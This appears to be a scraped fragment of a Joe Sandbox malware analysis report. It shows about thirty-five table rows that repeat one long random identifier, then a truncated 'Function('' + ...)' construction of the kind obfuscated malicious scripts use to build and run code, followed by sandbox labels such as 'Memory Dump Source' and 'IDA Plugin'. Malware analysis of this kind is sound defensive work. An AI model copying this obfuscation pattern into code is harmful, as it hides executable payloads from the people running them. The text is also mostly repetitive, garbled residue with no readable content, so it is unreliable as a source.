28 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
29 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
30 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
31 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
32 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
33 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
34 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
35 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
36 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
37 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
38 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
39 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
40 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
41 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
42 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
43 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
44 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
45 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
46 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
47 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
48 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
49 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
50 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
51 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
52 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
53 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
54 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
55 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
56 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
57 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
58 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
59 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
60 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
61 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
62 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
63 | Function ( '' + wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogj... |
|
Function 00007FFD9B6E33B5 Relevance: .0, Instructions: 49COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|